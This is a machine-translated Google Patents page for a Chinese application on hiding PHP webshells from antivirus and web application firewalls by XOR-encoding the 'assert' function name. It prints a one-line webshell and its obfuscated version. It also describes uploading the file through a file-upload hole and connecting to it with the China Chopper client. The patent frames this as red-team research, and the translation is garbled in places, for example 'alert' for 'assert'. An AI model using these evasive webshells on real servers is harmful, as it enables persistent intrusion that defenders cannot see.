CN112099846A - Webshell killing-free method based on random character XOR operation - Google Patents
Webshell killing-free method based on random character XOR operation Download PDFInfo
- Publication number
- CN112099846A CN112099846A CN202010856314.7A CN202010856314A CN112099846A CN 112099846 A CN112099846 A CN 112099846A CN 202010856314 A CN202010856314 A CN 202010856314A CN 112099846 A CN112099846 A CN 112099846A
- Authority
- CN
- China
- Prior art keywords
- killing
- webshell
- characters
- sensitive
- method based
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F8/00—Arrangements for software engineering
- G06F8/70—Software maintenance or management
- G06F8/72—Code refactoring
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/556—Detecting local intrusion or implementing counter-measures involving covert channels, i.e. data leakage between processes
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
Landscapes
- Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Physics & Mathematics (AREA)
- Computer Hardware Design (AREA)
- Virology (AREA)
- General Health & Medical Sciences (AREA)
- Health & Medical Sciences (AREA)
- Computer And Data Communications (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and can monitor the searching and killing system; the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated. The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The webshell file with the killing-free effect is flexible to generate and various in forming mode. The benefits of the red and blue confrontation on the network security are improved, the personnel quality of the network security is further improved, and the network security is better protected.
Description
Technical Field
The invention relates to the technical field of network security, in particular to a webshell killing-free method based on random character exclusive-or operation.
Background
With the development of internet technology, network security is more and more important, and the red-blue confrontation between network security is more and more important. The red and blue team is one of the important protection means for enterprises or organizations, and the result is to cope with the increasing security holes and the complicated and diversified network attacks. Only after the enterprises continuously resist red and blue to form a loophole closed loop, a powerful security defense system can be constructed.
The red and blue countermeasures are a continuous process, the attack means of enemies are continuously changed and continuously improved, and the defense of the enemies is continuously improved so as to ensure the safety of the network. Often, it is especially important for the red team to get a boundary entry to the web, and the webshell also becomes the core for the red team to maintain the boundary rights. For the traditional webshell, all large antivirus software and a website application level intrusion prevention system WAF strictly prevent staring, and effectively reduce the attack efficiency of an attacker.
In the actual red and blue countermeasures, the attack performance of an attacking party is continuously improved, and the method has very important significance on the network security of enterprises or organizations. The attack performance of the attacker is improved, and the corresponding improvement of the performance of the defense is facilitated. Therefore, the attack performance of the attacker is also an important direction for the research in the field of network security. How to be able to "kill" the webshell quickly through variant codes also becomes one of the requisite weapons for the red team.
Therefore, it is necessary to provide a webshell killing-free method based on random character xor operation to overcome the deficiencies of the prior art.
Disclosure of Invention
The invention aims to avoid the defects of the prior art and provides a webshell killing-free method and a test method based on random character XOR operation, which can hide sensitive keywords and enable the monitoring of a killing system to be realized.
The above object of the present invention is achieved by the following technical means:
the webshell killing-free method based on the random character XOR operation is provided, sensitive keywords concerned by a searching and killing system are represented by representation characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the representation characters and can monitor the searching and killing system;
the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated.
Preferably, the sensitive key is a sensitive function or key.
Preferably, the sensitive key is an eval or alert function.
Preferably, in the webshell killing-free method based on the random character exclusive-or operation, the first random extraction of the characterization characters is performed with exclusive-or processing with each character in the sensitive keywords respectively to obtain a first exclusive-or expression, and then the first expression and the first random extraction of the characterization characters are performed with exclusive-or expression to construct the webshell file of the PHP script.
In another preferred embodiment, in the webshell killing-free method based on random character xor operation, each character in the characterization sensitive keyword is obtained through character xor.
Further, in the webshell antivirus method based on the random character exclusive-or operation, the searching and killing system is antivirus software or a website application level intrusion prevention system.
Further, the webshell killing-free method based on the random character exclusive-or operation is provided with a random character pool, and random characters are extracted from the random character pool.
According to the webshell killing-free method based on the random character XOR operation, sensitive keywords concerned by the searching and killing system are represented by the representation characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the representation characters and can monitor the searching and killing system; the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated. The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Detailed Description
The invention is further illustrated by the following examples.
Example 1.
A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and can monitor the searching and killing system.
The representation characters are different from the expression characters forming the sensitive keywords, the representation characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the representation characters is calculated.
The antivirus system is antivirus software or a website application level intrusion prevention system. In the defense process, the searching and killing software usually checks the sensitive keywords, and if the sensitive keywords exist in the file, the searching and killing system can prevent the network security risk. If there are no sensitive keywords in the webshell file or the like, a pass is given by the check.
The technical scheme of the invention utilizes the representation characters to express in a mode different from the sensitive keywords, and the representation characters have no sensitive keywords, so that the monitoring of a searching and killing system can be realized. The result obtained after the characteristic characters are subjected to XOR operation is just a sensitive keyword, and the performance of the original file can be kept. Therefore, the method can achieve the killing-free effect of the webshell and maintain the performance of the original file.
The sensitive key is a sensitive function or a key, and specifically may be an eval or alert function.
Among the logical operations, in addition to AND OR, there is an XOR operation, called "XOR operation" in chinese, defined as: if the two values are the same, false is returned, otherwise true is returned. That is, the XOR may be used to determine whether the two values are different.
true XOR true//false
false XOR false//false
true XOR false//true
true XOR false//true。
The XOR operation has one feature: if an XOR is performed twice in succession on a value, the value itself is returned.
// first XOR// second XOR
1010^1111//0101 0101^1111//1010
For the reversibility of the XOR operation, the killing-free of the webshell is realized by using the point.
The core of the webshell of the PHP is the eval function and the alert function, and the two sensitive functions or keywords are also the focus of the traditional antivirus software and WAF.
The webshell killing-free method based on the random character XOR operation can randomly extract the characterization characters for the first time to be XOR-processed with each character in the sensitive keywords respectively to obtain a primary XOR expression, and then XOR-express the primary expression and the characterization characters randomly extracted for the first time to construct a webshell file of the PHP script.
For example, in one embodiment:
originally, the method is a function of alert, and a character string with the length of six digits is formed by randomly extracting characters and symbols to construct a webshell file of the PHP. In PHP:
then the traditional webshell:
<?PHP assert($_POST[123]);?>
is structured as follows:
<?PHP$a='IWP"NK'^'($#G<?';$a($_POST[123]);?>
in <? PHP alert ($ _ POST [123 ]); is there a In the method, due to the fact that the alarm is contained, the alarm is focused by antivirus software and WAF, and cannot pass safety detection. Is structured as <? The method comprises the steps of providing a chip, a.
In this example, for each character in the sensitive keyword to be constructed, the character is subjected to xor processing with a random character to obtain a first xor expression ' IWP "NK ', and then the first xor expression ' IWP" NK ' is subjected to xor processing with a first randomly extracted token character ' ($ # G <.
And (3) carrying out actual scene application in the example, and verifying the validity:
the Hongyu finds a web site with any file uploading vulnerability, and can upload the webshell file: php.
The code is traditional webshell: <? PHP alert ($ _ POST [123 ]); is there a < CHEM > A
Php is found to be killed by the antivirus software.
Constructing a killing-free webshell file shell2.php by using an exclusive-or operation principle: <? PHP $ a ═ IWP "NK '^' ($ # G <.
Uploading the Shell2.php to a web site with a vulnerability, and displaying the soft killing result that the scanning is not at risk. And a Chinese kitchen knife is connected with the webshell, so that the uploaded Shell2.php file can be normally accessed.
The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Example 2.
A webshell killing-free method based on random character XOR operation has the same other characteristics as embodiment 1, except that: the modes of constructing the webshell killing-free file through the XOR operation are different.
And obtaining each character in the characterization sensitive keyword through character XOR. Taking eval as an example, in this embodiment, two character representation evals of "e", "v", "a", and "l" can be obtained through xor operation are sequentially and randomly extracted, and a webshell file of the PHP is constructed.
Since there are a plurality of sets of character pairs capable of obtaining "e" by the exclusive-or operation and a plurality of sets of character pairs capable of obtaining "v" by the exclusive-or operation, … …, there are various ways of constructing sensitive joint words expressed by the exclusive-or relationship and there is randomness. Therefore, the webshell files of the PHP constructed at different times have various forms, and have diversity and randomness. Regardless of how the character is extracted, it is only necessary that the result after the final exclusive-or operation is equal to assert or eval.
The webshell killing-free method based on the random character XOR operation can set a random character pool, extracts random characters from the random character pool, and is convenient for constructing the XOR relation.
The method provided by the invention is used for verifying a plurality of webshell killing-free files formed by adopting the method, and the result is displayed and can be monitored by a searching and killing system.
The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Finally, it should be noted that the above embodiments are only used for illustrating the technical solutions of the present invention and not for limiting the protection scope of the present invention, and although the present invention is described in detail with reference to the preferred embodiments, it should be understood by those skilled in the art that modifications or equivalent substitutions can be made on the technical solutions of the present invention without departing from the spirit and scope of the technical solutions of the present invention.
Claims (7)
1. A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, a webshell file of a PHP script is constructed, and the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and is monitored by the searching and killing system;
the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated.
2. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 1, wherein the sensitive keyword is a sensitive function or a keyword.
3. The webshell suicide avoiding method based on the random character exclusive-or operation as claimed in claim 2, wherein the sensitive keyword is eval or alert function.
4. The webshell killing-free method based on random character XOR operation of claim 3, wherein the first random extraction of the characterization characters is performed with XOR processing with each character in the sensitive keywords to obtain a first XOR expression, and then the first expression is performed with XOR expression with the first random extraction of the characterization characters to construct the webshell file of the PHP script.
5. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 3, wherein each character in the characterization sensitive keyword is obtained by character exclusive-or.
6. The webshell exempting method based on random character XOR operation of any one of claims 1 to 5, wherein the killing system is antivirus software or a website application level intrusion prevention system.
7. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 6, wherein a random character pool is provided, and random characters are extracted from the random character pool.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202010856314.7A CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202010856314.7A CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Publications (1)
Publication Number | Publication Date |
---|---|
CN112099846A true CN112099846A (en) | 2020-12-18 |
Family
ID=73754178
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202010856314.7A Pending CN112099846A (en) | 2020-08-24 | 2020-08-24 | Webshell killing-free method based on random character XOR operation |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN112099846A (en) |
Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN1604585A (en) * | 2003-09-30 | 2005-04-06 | 华为技术有限公司 | Method for security transmission of card number information from IP terminal to soft switch |
CN104933361A (en) * | 2015-06-05 | 2015-09-23 | 浪潮电子信息产业股份有限公司 | Device and method for protecting login password |
CN106919811A (en) * | 2015-12-24 | 2017-07-04 | 阿里巴巴集团控股有限公司 | File test method and device |
CN108259619A (en) * | 2018-01-30 | 2018-07-06 | 成都东软学院 | Network request means of defence and network communicating system |
US20190141075A1 (en) * | 2017-11-09 | 2019-05-09 | Monarx, Inc. | Method and system for a protection mechanism to improve server security |
DE102018102386A1 (en) * | 2018-02-02 | 2019-08-08 | Infineon Technologies Ag | Method for transmitting data, method for receiving data, master, slave, and master-slave system |
CN111163094A (en) * | 2019-12-31 | 2020-05-15 | 奇安信科技集团股份有限公司 | Network attack detection method, network attack detection device, electronic device, and medium |
-
2020
- 2020-08-24 CN CN202010856314.7A patent/CN112099846A/en active Pending
Patent Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN1604585A (en) * | 2003-09-30 | 2005-04-06 | 华为技术有限公司 | Method for security transmission of card number information from IP terminal to soft switch |
CN104933361A (en) * | 2015-06-05 | 2015-09-23 | 浪潮电子信息产业股份有限公司 | Device and method for protecting login password |
CN106919811A (en) * | 2015-12-24 | 2017-07-04 | 阿里巴巴集团控股有限公司 | File test method and device |
US20190141075A1 (en) * | 2017-11-09 | 2019-05-09 | Monarx, Inc. | Method and system for a protection mechanism to improve server security |
CN108259619A (en) * | 2018-01-30 | 2018-07-06 | 成都东软学院 | Network request means of defence and network communicating system |
DE102018102386A1 (en) * | 2018-02-02 | 2019-08-08 | Infineon Technologies Ag | Method for transmitting data, method for receiving data, master, slave, and master-slave system |
CN111163094A (en) * | 2019-12-31 | 2020-05-15 | 奇安信科技集团股份有限公司 | Network attack detection method, network attack detection device, electronic device, and medium |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
Gupta et al. | A literature survey on social engineering attacks: Phishing attack | |
Almeshekah et al. | Cyber security deception | |
Sabillon et al. | Cybercrime and cybercriminals: A comprehensive study | |
Medvet et al. | Visual-similarity-based phishing detection | |
Rao et al. | A computer vision technique to detect phishing attacks | |
Sabillon et al. | Cybercriminals, cyberattacks and cybercrime | |
Almeshekah et al. | Improving security using deception | |
Chen et al. | Intrusion detection | |
Van Heerden et al. | Classifying network attack scenarios using an ontology | |
Huang et al. | Countermeasure techniques for deceptive phishing attack | |
Hansman | A taxonomy of network and computer attack methodologies | |
Mishra et al. | Hybrid solution to detect and filter zero-day phishing attacks | |
Rai et al. | A study on cyber crimes cyber criminals and major security breaches | |
CN113645181B (en) | Distributed protocol attack detection method and system based on isolated forest | |
Telo | Supervised machine learning for detecting malicious URLs: an evaluation of different models | |
Veprytska et al. | AI powered attacks against AI powered protection: Classification, scenarios and risk analysis | |
Hashem et al. | A proposed technique for simultaneously detecting DDoS and SQL injection attacks | |
Kunwar et al. | Framework to detect malicious codes embedded with JPEG images over social networking sites | |
Goyal et al. | Cyber crime in the society: Security issues, preventions and challenges | |
Rubenstein | Nation state cyber espionage and its impacts | |
CN112099846A (en) | Webshell killing-free method based on random character XOR operation | |
Soufiane et al. | SaaS Cloud Security: Attacks and Proposedsolutions | |
Venkatesh et al. | Identification and isolation of crypto ransomware using honeypot | |
Almeshekah et al. | The case of using negative (deceiving) information in data protection | |
Gao et al. | A cyber deception defense method based on signal game to deal with network intrusion |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
RJ01 | Rejection of invention patent application after publication | ||
RJ01 | Rejection of invention patent application after publication |
Application publication date: 20201218 |